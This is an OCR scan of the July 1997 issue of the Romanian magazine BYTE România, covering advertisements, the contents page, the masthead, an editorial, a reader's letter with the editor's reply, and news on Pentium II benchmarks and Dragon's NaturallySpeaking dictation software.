a 95.25... SED eee oe oe — yy
3 CE si wes
EVEQDETEECE E
Visual Objects 2.0
Fa | = i [le IntranetdelaSun
ae Îi Locuinţeinteligente
| a Magazine de date
i on Confruntare MMX:
Pentium vs. K6
13 interfete din noua generatie
permit accesul usor la Net
Valabil la 31.12.1997 :
Retelele virtuale private reduc i sea ar Pisa Acasa
costurile pentru acces RO, 4300 Tg. Mureș, Cp 172 OP 1 L
APROBAT R.A.P.R.
Nr. 103/DC/040/1997
PROMOȚIE |
EXTRAORDINARA
VARA |
EPSON Saiz Color 500
Tomsa La fiecare imprimantă EPSON Stylus Color 500
primanta Ink-Jet color A4 Seas
in tehnologie MULTI LAYER PIEZO pe care o cumpăraţi primiţi GRATUIT:
Imprimare pe hârtie, folie sau autocolante î :
@ 2 folii de transfer termic
mn EaE e Creative Design Pack Software
ppm monocrom :
e Un tricou EPSON
720 x 720 dpi (orizontal x vertical) Cu foliile de transfer și software-ul special pentru
Casetă cu 100 coli cu alimentare automată ar) grafice va puteti concepe și imprima singuri
cu câte o coală; propriile dumneavoastră tricouri!
alimentare manuală
ADRESAȚI-VĂ CHIAR ACUM CELUI MAI APROPIAT DEALER EPSONI!
Pentru informaţii suplimentare:
Tel. 230 03 14, Fax: 230 03 13
SIMBOLUL TEHNOLOGIEI EPSON’
ThinkPad
Microsoft”
ÎNHERE.DO YOU. MANI TO.GO TODAY
A
Authorized Distribution Partner/ {
DSP for Romania
jeraţi
Il
lana
tif
“ lex BIT. Made in Romania
Lipscani 102, Bucuresti
Tel: 3122360/6137282 Fax: 3122630 Mierosotft Hot Line: 9120948
Business Partner
mi
eee
Hi)
COPYING FAXING PRINTING COLOUR
at Ba
SCANNING
si a a.) on
DOCUMENT DIGITAL
CUSTOMER SATISFACTION
MANAGEMENT PHOTOGRAPHY IN IMAGING
ba .
VIN LASERELE |
upă 15 ani de experiență în tehnologia
laser, Minolta lansează acum o nouă
linie de imprimante. Arată ca și cum ar veni
GI s patrol OSII SE OI hus. oC up OOS COT
jumătate dir spățiul la. câre v-aţi fi. astepiat;
Oo Pe Mile ee letă IMPRIMANTA. MINOLTA PAGEPRO 6
A FOST DESEMNATA "NUMARUL UNU IN
TOPUL PRODUSELOR DIN ACEASTA
CATEGORIE” IN EDIȚIA BRITANICĂ A PC
MAGAZINE, NR. 10 DIN OCTOMBRIE 1996.
de imprimante
laser, de la unități
abea EN OI IEI PANA -la 1Mpriimanre ae
refveao Tull COLOL1OaTS avănd procesoare
RISGONGCOPrDOTrdte- Care permiti. o. vileză
de. Impliilmare. nemdaiinralntta pana
acum în univers. lată ceea ce numim noi
imagine dincolo de imaginație.
Imprimante Minolta PagePro
Minolta România S.R.L., Șoseaua Olteniţei
nr, 35-37, sector 4, București 79656
Fax: 01/330.25,47
PERFORMANŢEI
www.salient.ro
SALIENT Group
București: Calea Floreasca nr. 242
Tel: 01-2305791, 2321045
Fax: 01-2321045
Timișoara: Piaţa Timișoara 700 nr. 1
Tel: 056-135568, 201041, 201042
Fax: 056-190464
AMERICA
7ECHNOLOGI
a
as i
2 4
Net Ware
Approved
SCO
SOFTWARE
COMPATIBLE au
ARANTIE
| SALIENT
|
SALIENT « STANDING OUT in Computer & Networking Technology
re
“CD-Rom. Dacă aveți în vedere
nternet http://www.imation.com i
pentru aţă ON este lider mc RE | edii magnetice
i N
IMATION
[91071 70) A eared
tel:O92-200722
fax:O1-3129302
4 > Sun
mi crosystems i
Network Computing
„. Informatica Secolului XXI
(CA
SA
JAVA
„ROMSYS sa
Calea Floreasca 169
BUCUREȘTI
Tel: 230.08.10
Fax:230.08.15
lulie 1997, vol. 3, nr. 7
De Tom R. Halfhill
Interfața utilizator este pe cale să
sufere cea mai mare revoluţie din '84. Să
ILLUSTRATION: VICTOR GAD © 1997
Data Mining Servicii de retea GSM
de la birou
În curând, ultimele stan-
Unnelte mai intuitive ajută darde europene GSM vor
managerii să ia decizii mai oferi mai multă inteligență
potrivite în afaceri. pentru serviciile telefonice.
O afacere privată virtuală
De Mike Hurwicz
În sfârșit o modalitate de
economisire cu Internet:
rețelele virtuale private.
6 BYTE Romania IULIE 1997
Atentie cumparatori
din magazine de date
De Karen Watterson
De sus in jos sau jos in sus, con-
struirea unui magazin de date
oferă informaţii valoroase.
JDBC
De Pito Peter și
Stelian Vultur
Interfete Java care permit
accesul la bazele da date..
EDITORIAL
O
=
oO
»
©
INBOX
as
=
Teste Pentium II - 300MHz12
Vorbire naturala 12
Aparate foto digitale 15
EVENIMENI
REPORTAJ
Pe plaiuri catalane
De Romulus Maier
21
DOSAR
MESE ROTUNDE LA CERF'97
Schimbările tehnologice și
școala în România 69
Internet în România 75
WEB MASTER
Programare CGI în Perl
79
De Peter Csaba
LAB REPORI
me SOFTWARE
6
Deeditorii
Studiem 10 sisteme Pentium —
„care oferă tehnologie MMX
SEAN AC
Cărțipe WEB
83
De Cristian Matei
PREZENTĂRI
WordPerfect de la Corel
86
Produse Minolta
87
Staţia desktop 02
89
Intranet în oferta Sun
91
Visual Objects 2.0
97
Locuinţe inteligente
103
FUNDAMENTE
BAZE DE DATE
Utilizarea Web cu baze de
date vechi
23
De Alexa Bielefeld, Rick
Martin, si Brian Wachter
Salvo va permite sa utilizati
protocoale pentru acces la
mainframe.
UC
Inima PC-urilor miniaturizate
25
De Lyle Supp
Procesorul Hitachi SH-3.
PROGRARE
API de la Concert
devine multi-platformă
27
De Justin Morgan
lată o modalitate rapidă de a
muta aplicaţii Mac-OS la Win-
dows şi Unix.
SISTEME DE OPERARE
JavaOS: Client sărac,
servicii bogate
29
De Charles Mirho
si Tom Clements
Java OS ocupă puţină memo-
rie, dar concepţia orientată
reţea permite accesul la servicii
complexe.
REȚELE
Siguranţă pentru ATM:
partea a Il-a
31
De Jeffrey Fritz
Cum realizati redundanta prin
emulare LAN şi configurare
adecvată pentru switch şi ruter.
„ Animaţi situl propriu de Web
Clasele java.net.*
107
Fundamentele comutării
113
FORBES
De gustibus 119
sins
CE-l NOU
Monitor plat Hitachi 123
„ Aplicaţii Web disponibile | Aplicaţii Solaris 124
CC. Oracle 8 124
„De David Seacbrist
şiStephenPlatt. —_—
Terminologia noastră
125
De Dan Matei
COMENTARIU
Cresteti si va inmultiti
127
De Dan Iancu
ULTIMA
Finlanda si
viitorul viitorului Europei
130
De Iosif Fettich
CASETA REDACŢIEI
DIRECTOR (GENERAL: TEHNOREDACTARE:
Romulus Maier (rmaier@agora.ro) Reman Laszlo, Valics Lehel
DIRECTOR EXECUTIV: ADMINISTRAȚIE: Ingrid Maier
Adrian Pop (adipop@agora.ro) Marxenne: Gabriela Bucsa, Annamaria Pascu
DIRECTOR EDITORIAL: (CONTABILITATE: Pap llona
Mircea Sârbu (msarbuQagora.ro) Secretariat: Rodica Fettich
REDACTOR ȘEF: DISTRIBUȚIE: Ștefan Curtifan,
Darvas Attila (adarvas@agora.ro) Doina Cesa, Natalia Vanau
SECRETAR GENERAL DE REDACŢIE: REPREZENTANȚĂ BUCUREȘTI:
Daniel Moldovan (dmoldovan@agora.ro) Daniela Pastramă, tel: (01)-3309281
REDACŢIA: fax: (01)-3309285
Mircea Sabau (msabau@agora.ro) C.P. 94 0.P. 49 Bucuresti
REDACTORI ASOCIAȚI: LS.S.N.: 1223-9801
losif Fettich (ifettich@agora.ro) TIPARUL: S.C. Infopress S.A.,
Cristian Mateescu (mateescu@agora.ro) Odorheiu Secuiesc,
LA ACEST NUMAR AU MAI COLABORAT: Tel: 066-216483
Cristian Matei (cmatei@agora.ro) EDITURA: Computer Press Agora s.r.l.,
Harrison Forbes (Chicago); C.P. 172 - 1, 4300 Tirgu Mureș
Péter Csaba (Târgu-Mureș); TELEFON: (065) 16.65.16, 16.62.57
Dan lancu (Boston); Fax: (065) 16.62.90
Veres Viktor (Targu-Mures); BBS: (065) 21.07.80
Roxana Marin (Bucuresti); (8N1, 14400 bps, login: bbs)
Istvan Laszié (Oradea); E-MAIL: redactia@agora.ro
Peter Corcoran (Irlanda); WEB: http://Awww.agora.ro/
Nicoleta-Corina Pelin (Bucuresti); Prides ot Sldcive wtactaloe dvi: cls cable Ga să să
Cristian-Florentin Pelin (București); încadreze în profilul revistei si să nu fi fost deja publicate.
Pito Peter (Târgu-Mureș); Expedierea unui manuscris implică acceptul autorului pen:
Stelian Vultur (Târgu-Mureș); tru publicarea lui. Manuscrisele nu se restituie. Redacţia își
Dan Matei (București); rezervă dreptul de a edita și publica mesajele e-mail în care
CORECTURA: nu se specifică explicit că nu sunt destinate publicării.
Aurora Laslo
COPYRIGHT: Materialul editorial din BYTE Magazine USA sau National Software Testing Laboratories, Soft-
ware Digest sau PC Digest tradus și retipărit în acest număr aparține companiei McGraw-Hill, Inc. Copyright
1997. Toate drepturile sunt rezervate. Publicat cu acordul McGraw-Hill, Inc., Avenue of the Americas, New York,
New York 10020 USA. Reproducerea în orice formă, în orice limbă, integral sau în parte, fără permisiunea scrisă
a McGraw-Hill, Inc., este interzisă. BYTE, National Software Testing Laboratories, NSTL, Software Digest, PC
Digest și InterMark sunt mărci înregistrate McGraw-Hill, Inc.
IULIE 1997 BYTE România 7
8 BYTE Romania
e 4 iulie, Ziua Independentei
SUA, cercetatorii de la NASA
au reusit sa plaseze pe planeta
Marte o stație trimisă in
cadrul misiunii Mars Pathfinder, misiune
condusă de JPL (Jet Propulsion Labora-
tory: http://mpfwww.arc.nasa.gov/de-
fault.html). De pe statia Sagan Memori-
al, vehiculul Sojourner Rover isi cauta
acum calea pe Planeta Rosie. $i noi, cei ca-
re suntem conectati la Internet, putem ur-
mari drumul parcurs de Sojourner, ima-
ginile trimise de statie, starea vremii pe
Marte si obstacolele care stau in calea ve-
hiculului. Putem admira realizarile tehno-
logice de vârf, dar nu trebuie să uităm nici
de problemele existente, mai apropiate de
noi. Sojourner, plasat în România ar
descoperi multe lucruri surprinzătoare
poate pentru echipa de la JPL.
În acest număr veţi putea citi în dosarul
BYTE România punctele de vedere ale
unor personalităţi avizate, despre două
domenii fără de care mult discutata Soci-
etate Informațională de la noi nu va putea
exista. Este vorba de educaţie si Internet
şi de posibilitatea de utilizare a noilor
tehnologii educaţionale şi de comunicații
în condiţiile existente în România. Ser-
viciile Internet sunt sortite succesului, deşi
dinamismul furnizorilor introduce o anu-
mită neclaritate privind structura ofertei.
Multe depind de legiuitorii țării, de com-
paniile de telecomunicaţii, de bănci şi ins-
tituţii care mai trebuie să descopere facili-
tățile serviciilor oferite. Sojourner ar
constata infrastructuri în formare, simi-
lare celor din alte colţuri ale lumii, servicii
similare, web-masteri competenţi şi lup-
ta lor cu lipsa de înţelegere a societăţii.
Tehnica de calcul și comunicațiile nece-
sită un efort de înţelegere pe care prea
puţini încă doresc să-l facă.
Învățământul este Cenușăreasa soci-
LULIE: 19/97
Calea
etăţii. Unii visează la integrare europeană,
dar fără o societate educată care benefici-
ază de un sistem de învățământ modern,
acest lucru îmi pare doar iluzie. Poate
noua lege a învățământului mai schimbă
ceva, dar cadrele promovate de răposatul
PCR (fără aprobarea căruia nu puteai să
intri la doctorat) mai ocupă multe funcții
de decizie în structura sistemului de învă-
țământ, structură în care nu s-a făcut o re-
formă reală. Asemenea indivizi pot bloca
fluxul corect de informaţii şi iniţiativele
(de genul realizării SunSite la UPB).
Sojourner ar putea furniza informaţii de
necrezut pentru cercetătorii JPL, formaţi
în alte condiţii. Deşi nu este sigur, pentru
că specialiştii tineri pleacă în continuare. .
şi unii ajung să fie apreciaţi (de către
Microsoft, de exemplu) în America. Prob-
lema este serioasă, şi discutând cu direc-
torii câtorva firme serioase de la noi, au
zis că preferă să angajeze personal de spe-
cialitate cu vârsta peste 40 de ani, pentru
că tinerii pleacă după un an, doi, după ce
învață concret produsele firmei.
Să privim puţin spre viitor, păşind cu
grijă, ca să nu cădem într-una din nenu-
măratele gropi existente (strada pe care
locuiesc a fost din nou săpată, pentru a
treia oară în ultimii ani, şi arată ca imagi-
nile transmise de Sojourner). Interfetele
de calculator vor suferi o schimbare revo-
luţionară. Suprafaţa de lucru obișnuită
GUI se va transforma în NUI, suprafaţa
utilizatorului de rețea. Aplicațiile vor fi de
rețea și tendinţa este clara. Cover Story
prezintă noile suprafeţe. Rețelele virtuale
private sunt interesante pentru cei care
lucrează la firme cu sedii aflate în multe
locuri unde există posibilitate de conec-
tare la Internet. Există în acest număr și
un articol despre soluţiile intranet oferite
de Sun. Magazinele de date sunt utile chiar
şi pentru firme mai mici, unde se doreşte
fundamentarea deciziilor manageriale şi - :
posibilitatea de previziune şi modelare.
Dar găsiţi în acest număr şi articole despre
MMx şi despre aplicaţii Web, în Lab Re-
port. Sau aplicaţii Java şi JDBK. Un alt su-
biect interesant, prezent în revistă este cel
al caselor inteligente. Reţeaua realizată la
domiciliu vă poate oferi confortul dorit,
siguranţă şi economie de energie. Aceste
rețele de domiciliu din casa dumneavoas-
tră vor fi controlabile şi de pe Web. Nu
avem încă oraşe digitale, dar există pro-
„iecte. Casa inteligentă, orașul inteligent și
Internet sunt vise pe cale de a fi realizate.
Nişte versuri mai pesimiste, citite pe
vremuri, afirmau: „În temeiul muntelui /
Cale nu-i cărare nu-i“. O misiune Path-
finder ar putea poate oferi informaţii utile.
Este însă nevoie de o legislaţie modernă,
de programe guvernamentale serioase,
făcute împreună cu cei care lucrează efec-
tiv în domeniul calculatoarelor şi
comunicaţiilor şi au realizări efective, pen-
tru a găsi căile dezvoltării viitoare. Şi de
initiative locale. Ml
Darvas Attila
adarvas@agora.ro
OREALISIVI™
Gen II RIVALUL
STABILIŢI NOI STANDARDE DE CALITATE CU IMPRIMANTELE CANON BUBBLE JET
Cu seria de imprimante Canon bubble-jet BJC-240,
BJC-4200 şi BJC-4550 şi folosind kit-ul opţional
Canon Photo, nu veţi mai putea
pl deosebi realitatea de imaginea
i imprimată. Imprimantele bubble-
jet, concepute şi dezvoltate de
Canon, oferă performanţe de invidiat atât din
punct de vedere al calităţii imprimării cât şi al
vitezei, eficienţei şi silenţiozităţii în funcţionare.
Indiferent dacă sunt folosite în particular sau în
medii organizate de lucru, pentru reproducerea
de documente alb/negru sau color, în volum mai
mic sau mai mare, rezultatele sunt la fel de
remarcabile. Mai mult. Pentru a reproduce cât
mai fidel imagini, nu trebuie decât să folosiţi
kitul opţional Canon Photo, conceput special
pentru seria de imprimante Canon bubble- -jet.
Filozofia care îi stă la bază este simplă: un print
al unei fotografii trebuie să arate ca o fotografie.
Incredibil? Da! Imposibil? Nu! Sistemul
Photorealism, brevetat de Canon, asigură o
reproducere fidelă şi fără granulaţie a tonurilor
de culoare şi dă culorii adâncimea necesară unui
rezultat cu adevărat apropiat de realitate. Nuanţe
subtile, cum ar fi tonurile pielii, sunt redate
perfect datorită acurateţii punctului de imprimare
şi a cernelurilor special concepute pentru kit-ul
Canon Photo.
NUMAI CU O
IMPRIMANIA
CANON PUTETI
Reprezentanta Romania
FACE MAI World Trade Center Bucuresti
MULT! zitiei 2, intr. D, birou 1.
He Ma 3 38 54, fax. 01-223 42 36
Wholesalers: Bucuresti: ROMUS tel (01)230 16 50 eTORNADO SISTEMS tel (01) 667 28 23; Constanta: TORNADO SISTEMS tel (041) 618 580
Resalers: Bucuresti: e BLUE RIDGE INT. tel (01) 210 68 28 eDECK COMPUTER tel (01) 211 84 03 eDIGITAL PRO SYSTEM tel (01) 250 65
27 eKT COMPUTERS tel (01) 311 19 62 e ORCAS BIROTICA tel (01) 210 30 93 eRAFFLES COMPUTERS tel (01) 311 26 82 eSOTA tel (01)
232 0388; Arad: ELECTRONIC SHOP tel (057) 289 642; Bacău: MICROSISTEM CONEX tel. (034) 117 411; Baia Mare: MONS MEDIUS tel (062)
434 541; Brasov: SYSTEM tel (068) 318 663 e + COSIDOR COM tel (068) 310 537; Cluj: eSOFT GROUP tel (64) 430 000 e GENETYP tel (064)
190 787; Craiova: DECAROM SERVICE tel (051) 132 954; Deva: TOP TECH tel (054) 213 871; Iaşi: UNIVERSAL R.X. tel (032) 212 660
e OPEN SYSTEM tel (032) 225 141; Oradea: TONER tel (059) 430 665; Pitesti: OPEN SYSTEM tel (048) 219 000; Sibiu: ECO COPY & PRINT
tel (069) 213 189; Suceava: ASSIST SOFTWARE tel (030) 521 100; Timisoara: ASSITEC tel (056) 190 337 e + EASTERN DIGITAL tel (056) 221 443;
Zalău: MAGIC COMPUTER tel (060) 616 099
Se apropie concediile. Cei ca-
re lucrează sunt ocupați să ter-
mine înainte de plecare activi-
tăţile începute.
IC
(Intranet Computer)
Citind un articol apărut în re-
vista BYTE, am fost neplăcut
impresionat de concepţia
unui reprezentant al firmei
ORACLE despre Network
Computer. Acesta propune
un sistem „servere şi terminale
NC, total dependent de buna
funcţionare a rețelei, de fur-
nizorii soft-ului (integral
ORACLE „precum se pare) şi
eventual, de toată ierarhia de-
cizională a firmei unde lucrea-
ză utilizatorul. Deci mai sunt
admiratori, plasați în funcţii
importante, ai sistemelor hi-
per - centralizate şi dictatori-
ale, care ucid iniţiativa şi crea-
tivitatea. Nici alte „avantaje“
“ale NC nu m-au convins:
- costul redus obţinut prin:
- utilizarea de componente
neperformante va duce la o
rapidă uzură morală şi
depăşire tehnică
- simplitatea internă „adică
lipseşte hard discul şi lecto-
rul de dischete face posibil
un dezastru în cazul căderii
reţelei și ne dau un calcula-
tor total nemobil.
- gestionarea centralizata a fi-
şierelor, cu utilizarea unui
sistem unic de programe
face dificilă utilizarea de
soft independent, mai per-
formant.
După prima reacție de indig-
nare, m-am gândit la o soluţie:
un calculator care să aibă mul-
te din avantajele NC (mai pu-
ţin costul redus),dar care să
corespundă performanţelor
tehnice actuale și să încurajeze
iniţiativa individuală și diver-
sitatea (multi-sistem, multiple
programe, calculator flexibil
cu multe utilizări). L-am de-
numit după modul principal
de folosire IC. Așadar iată fişa
tehnică a IC-ului:
Cerinte standard:
“-Display: L.C.D. matrice acti-
va de înaltă rezoluţie (1400
x 750; cel puţin 258 culori);
- R.A.M. de mare capacitate
(>=32M);
- Monoprocesor performant
- fără harddisk
- sistem audio pentru sistem
de comanda vocal (+difu-
zoare,microfon);
- touch screen (utilizabil şi la
schiţare cu „degetele
libere“);
- 2 sloturi PCMCIA 1 ;
- memorii flash RAM sau
ROM care conţin sistemul
de operare, aflate pe una
din plăcile PCMCIA 1
- memorie flash RAM internă
pentru aplicaţii. Memoriile
specificate anterior trebuie
să fie de capacitate maximă
disponibilă (>= 128 M).
- port specializat conectare
prin cablu la reţeaua infor-
matică şi alimentare elec-
trică (conexiune unică, ra-
pidă, universală - la
_ dok-station-ul I.C.-ului, iar
in sala de sedinte la portu-
rile pentru participanti.
- antena (internă) pt. conec-
tare la rețeaua intranet-
radio a întreprinderii;
- port conectare tastatură
externă;
- porturi universale: 2 I.R.
(infraroşu)
- porturi pt.telefon (orice tip)
- porturi seriale,paralele etc.
- priză alimentare c.c;
- baterii de acumulatori cu sis-
tem avansat de economisire
a energiei.
Cumpărătorii potențiali:
Firmele care doresc un up-
grade al calculatoare vechi si
care doresc o conectare în
reţea ultra-flexibilă (care nu
este dependentă de o unică fir-
mă specializată); Toţi aceia
care doresc un calculator N.C.
mai performant sau un Lap-
Top uşor.
Poate fi utilizat în: Locurile
10 BYTE Romania IULIE 1997
fixe de muncă din întreprin-
dere, depanări, notarea, schi-
tarea sau înregistrarea audio
(eventual și video) a ideilor în
afara orelor de lucru obișnuite
(navete, acasă), verificarea
primară a proiectelor noi, ser-
verul de rețea făcând doar
procesările complicate de da-
te, prezentări produse, loc de
muncă mobil (întreprinderi
fără sediu, care se mută, care
au personal mobil).
Avantaje: Reducerea număru-
lui de periferice într-o între-
prindere la minim. Promo-
vează programele care au un
sistem de comandă avansat
(voce, touch screen ) accep-
tând însă şi terminalele clasi-
ce: tastatură, mouse, etc; În-
curajează cooperarea, lucrul
în rețea (mult mai eficient );
Comparativ cu N.C., are posi-
bilitatea de a rula orice pro-
gram de P.C. sau de a schimba
uşor sistemul de reţea; Rezo-
luţie înaltă a display şi compo-
nente care asigură performan-
țe grafice bune; Calitatea
înaltă a componentelor (nu
este un P.C. ieftin) îl recoman-
dă ca o investiţie de viitor în
această lume a informaticii, cu
evoluţie accelerată.
loan George Mateescu
rmateescu @ice.felix.ro
Conceptia ORACLE despre
NCa stârnit multe contro-
verse. Scrisoarea dumnea-
voastră dovedește totuşi că
nu aţi înțeles corect ceea ce se
1UUĂ
dorește cu un astfel de echi-
pament. Dar dacă aţi fi facut
service sau administrare re-
tea, v-aţi fi dat seama cât este
de distructivă şi periculoasă
abordarea în stilul: să facă
toți ceea ce vor. Pot exista
desigur, grupe de creaţie şi
proiectare, dar NC în mod
sigur nu este pentru ei. În
schimb, este foarte bun acolo
unde aplicaţiile sunt bine def-
inite și utilizatorii au atribuţii
precise. Este mic (client su-
plu), versatil şi ieftin. Serve-
rul poate oferi în condiţii de
siguranță serviciile realizate
pentru NC. NC se bucură
deja de succes (de exemplu, la
firmele de asigurări sau la
bănci). Propunerea dumnea-
voastră de IC seamănă mai
mult cu tentativa de NetPC
pentru care nu prea văd vii-
tor. Un asemenea IC nu are
segment clar de piaţă, cei care
au activităţi creative, com-
plexe, vor lua un sistem per-
formant, cei cu multe apli-
caţii la firme vor adopta PC
în rețea, cei mobili, un laptop
dacă au bani, sau NC dacă au
activități clare (nu este pen-
tru jocuri). Regret că vă sim-
țiți lezat de concepția NC,
dar dacă urmăriţi şi eficienţa
economică a activităţii sunt
sigur că veţi opta pentru NC,
dumneavoastră sau conduce-
rea firmei la care lucraţi.
Darvas Attila,
adarvas@agora.ro
Noua imprimantă personală -
HP LaserJet 6L.
La dispoziţia ta.
Ca oricărui majordom care
se respectă, noii LaserJet GL
nici prin gând nu-i trece să te lase
să aştepţi. Te serveşte cu
o viteză de 6 pagini pe minut în
orice configuraţie a PC-ului la
care te-ai putea gândi.
De asemenea, face
echipă excelentă
cu gama de consumabile
Hewlett-Packard proiectate
pentru cerinţele tale de tipărire
cele mai variate.
Iar cu noua imprimantă
HP LaserJet 6L la dispoziţia
“= ta, singurul lucru care îţi
rămâne de făcut este să iei
foaia de hârtie din tavă.
IMPRIMANTELE HP. HÂRTIA ESTE ÎN SLUJBA TA.
S & T România — HEWLETT-PACKARD Service Center: 330 73 00
-BBS pentru suport tehnic HP: 330 72 21
HEWLETT®
PACKARD
[e
PARTENERI DIRECȚI
Bucureşti
AMERILEX 223 4323
AREXIM 311 1676
Q’NET 211 7855
SYSTEM PLUS 210 8565
MBL Computerland 230 4032
THEMA 230 5961
Timisoara
Bridgemen (056) 201 360
Cluj
uj
Sistec (064) 190 282
RESELLERI
Bucuresti
Alsys Data 411 2626
CIPRO 220 0400
DECK Computers 312 7811
Flamingo 222 4643
Lowtec 240 3698
Orcas Birotica 211 7780
Romtronic 312 1412
Software ITC 633 4471
Brasov
„ICO Computers (068) 151 650
Cluj Napoca
Microinformatica (064) 438 328
Constanta
GMP (041) 619 222
Galati
SPARCO (036) 465 270
Iasi
asi
LASER COM (032) 122 589
Radix (032) 210 423
Ploiesti
PLATIN Systems (044) 191 818
Targu Mures
Electro Orizont (065) 168 807
Timisoara
NETRING (056) 132 894
Stiri & Noutăţi
Primele rezultate pentru proce-
sorul Pentium II la 300 MHz
Ultimul procesor Pentium II al firmei Intel atinge frecventa de 300-MHz
xact cum ne aşteptam, testele
noastre efectuate asupra unui
PC, având un procesor Penti-
um II la 300-MHz, au scos in
evidenta performantele ultimului proce-
sor al firmei Intel, în comparaţie cu linia
procesoarelor x86 la 266-MHz a aceleiaşi
firme. Sistemul Pentium II la 300-MHz pe
care l-am testat, a obținut scorurile 5.0 şi
4.24 în testele BYTEmark pentru întregi,
respectiv pentru virgulă mobilă, în com-
paratie cu 3.8 şi 4.5 obţinute de un sistem
Pentium la 266-MHz.
Pentru câteva ore, BYTE a reuşit să aibă
acces la o placă de bază Tahoe 2 ATX a fir-
mei Tyan, cu procesor dual, echipată cu o
unitate centrală de prelucrare la 300 MHz
(cu magistrala memoriei cache L2 rulând
la 150 MHz, în timp ce magistrala sistemu-
lui funcţiona la 66 MHz). Din nefericire, nu
am avut suficient timp pentru a rula suita
noastră de teste Photoshop pe acest sistem.
Persoanele oficiale ale firmei Tyan (408-
956-8000;http://www.tyan.com), care au
construit, printre altele, placa de bază Ta-
hoe, ce suportă ultimul procesor Pentium
II al firmei Intel, au declarat că noul model
Tahoe al plăcii de bază îmbunătăţeşte per-
formanțele sistemului de la 3 până la 5 pro-
cente. Așa cum ne aşteptam, suita de teste
BYTEmark şi Bapco Sysmark pentru NT
Aplicații rapide la 300 MHz
266 MHz
Pentium II
300 MHz
Pentium Il
0 50 100 150 200 250 300
Testul Sysmark pentru NT al firmei Bapco
măsoară performanţele întregului sistem.
Sistemul 266 MHz are 64 MB RAM, Diamond
Multimedia Stealth 3D 2000 (4MB RAM) și
Maxtor 8512A EIDE. Sistemul 300MHz are 32
MB RAM, Matrox Millenium (2MB WRAM) și
Quantum Atlas Ultra SCSI-3.
12 BYTE Romania “IULIE 1997
Cinci calculatoare Pentium
90-MHz Pentium
200-MHz Pentium
200-MHz Pentium Pro
266-MHz Pentium Il
300-MHz Pentium II
0 1
2 3 4 5
BYTEmark măsoară performanţele UC, nu toate performanţele sistemului
4.0, au reliefat performanţele sistemului,
față de vechile sisteme Pentium II. Siste-
mele dotate cu versiunea de 300 MHz a
procesorului Pentium vor fi disponible cel
târziu în această vară.
— Dave Andrews
Vorbirea naturala
De ani de zile, industria de calculatoare si
dactilografii inversunati au asteptat ziua in
care oamenii să poată folosi un sistem de
recunoaştere a vocii, pentru a comunica cu
propriul lor PC, fără pauză între cuvinte.
Aparent această zi a sosit, de ea bucurân-
du-se mulţi operatori de culegere a datelor,
secretari și oameni cu anumite deficiențe.
NaturallySpeaking, un nou program al
firmei Dragon Systems (617-965-5200;
http://www.naturalspeech.com), reprezin-
tă prima generaţie de sisteme destinate dic-
tării continue pentru Win 95 si NT. Cu
_NaturallySpeaking, firma declara ca, in
timpul dictarii documentelor sau comenzi-
lor spre calculator, nu mai sunt necesare
pauzele intre cuvinte.
Ca şi multe alte pachete de recunoaștere
a vocii, NaturallySpeaking rămâne depen-
dent de vorbitor: Pentru a recunoaşte bine
vocea, software-ul trebuie antrenat. Persoa-
nele oficiale ale firmei Dragon nu au dezvă-
luit exact tehnica folosită de ei pentru recu-
noaşterea vocii fără pauză între cuvinte, ci
doar au menționat că NaturallySpeaking
foloseşte o nouă maşină de recunoaştere a
Pronuntarea cuvintelor no! se face
automat.
Semnul „+“ indică un cuvânt nou.
>, Acceseazd 200.000 de cuvinte + un
dictionar de cuvinte.
vorbirii în scopul creşterii performanţelor.
Deşi NaturallySpeaking pare să conducă
această cursă, competitorii firmei Dragon
declară că în curând vor avea şi ei produse cu
caracteristici similare de recunoaştere. „Cu
toţii vom face cât de curând acest pas“,
declara Mark Flanagan, vice preşedinte și
director general al firmei Kurzweil Applied
Intelligence, un alt important competitor pe
arena recunoaşterii vorbirii. „Din ceea ce am
văzut, firma Dragon a făcut un pas înainte în
privinţa dictării continue. Dar ea a anunţat
în primul rând un software în versiune alfa.
Cât timp va dura până să apară un produs
acceptabil 2“. Firma Dragon a declarat că pri-
ma versiune a noului produs va fi disponibilă
la sfârşitul lunii iunie, la un preţ de 695$.
NaturallySpeaking are nevoie de cel puţin
un procesor Pentium la 133-MHz, progra-
mul fiind mai rapid pe masini MMX.
Software-ul necesită 32MB RAM sub Win
95, 48MB sub NT 3.51 şi 60 MB spaţiu li-
ber pe discul hard. De asemenea, Naturally-
Speak are nevoie de o cartelă de sunet stan-
dard pe 16 biți sau un sistem de sunet intern,
în cazul calculatoarelor portabile. Programul
este livrat împreună cu un microfon. El are
un vocabular activ de 30.000 de cuvinte rezi-
dent în memorie şi un dicționar de rezervă
pe disc ce conţine 200.000 de cuvinte.
Având această caracteristică de recu-
noaştere continuă pe platforme Win 95,
acest produs pare a fi primul din gama pro-
duselor de uz general, dar totodată în afara
altor produse specializate de dictare con-
tinuă disponibile deja pe piaţă. „Firma IBM
a avut produse pentru vorbirea continuă
încă din anul 1996, numite MedSpeak și
fiind destinate pieţei de radiologie,“ spunea
Scott-Ker, purtătoarea de cuvânt a firmei
Pentru ca softul să înveţe
cuvintele rare, acestea tre-
buie doar rostite.
Frazele rostite pot fi înlocu
ite automat cu un text alter
influența competițiilor:
PC vs. TV vs. automobil
În concordanță cu un sondaj recent, mulți
americani par să ofere o mai mare importanță
calculatoarelor decât televizoarelor, dar mai
mică decât automobilelor. În sondajul organi-
zat de Luntz Research Companies la începutul
acestui an, la întrebarea care dintre calcula-
tor sau automobil va fi mai important pentru
viaţa lor în anul 2007, 55% dintre oamenii
chestionați au ales automobilul, 41% calcula-
torul, iar 4% nu au știut sau au refuzat să
răspundă. Într-un alt sondaj, trei din cele patru
generaţii de americani au declarat că rețelele
și calculatoarele au avut un impact mai mare
de-a lungul dezvoltărilor tehnologice în ultimii
20 de ani decât televizorul (pentru mai multe
informaţii, vezi diagrama). Doar pensionarii au
considerat că televiziunea prin cablu și video-
casetofoanele au avut un impact mai mare.
550%
22%
22%
38%
52%
IBM pentru sistemele de recunoastere a
vorbirii. ,,Dar dictionarul de 25.000 de cu-
vinte al produsului MedSpeak este perso-
nalizat pentru aplicatii specifice, in timp ce
NaturallySpeaking este destinat utilizarii
în activităţile de zi cu zi precum şi în alte
activităţi la domiciliu. Noi am utilizat infor-
maţia câştigată de la MedSpeak intr-un pro-
dus mult mai general, ce va fi lansat spre
sfârșitul acestui an.“
Recent, persoanele oficiale de la firma
IBM au introdus un sistem de recunoaştere
a vorbirii continue în limba chineză la Bei-
jing şi Hong Kong, dar prezentarea soft-
ware-ului făcută de firmă a constituit doar
o demonstraţie tehnologică. Un purtător de
cuvânt spunea că, până la sfârşitul acestui
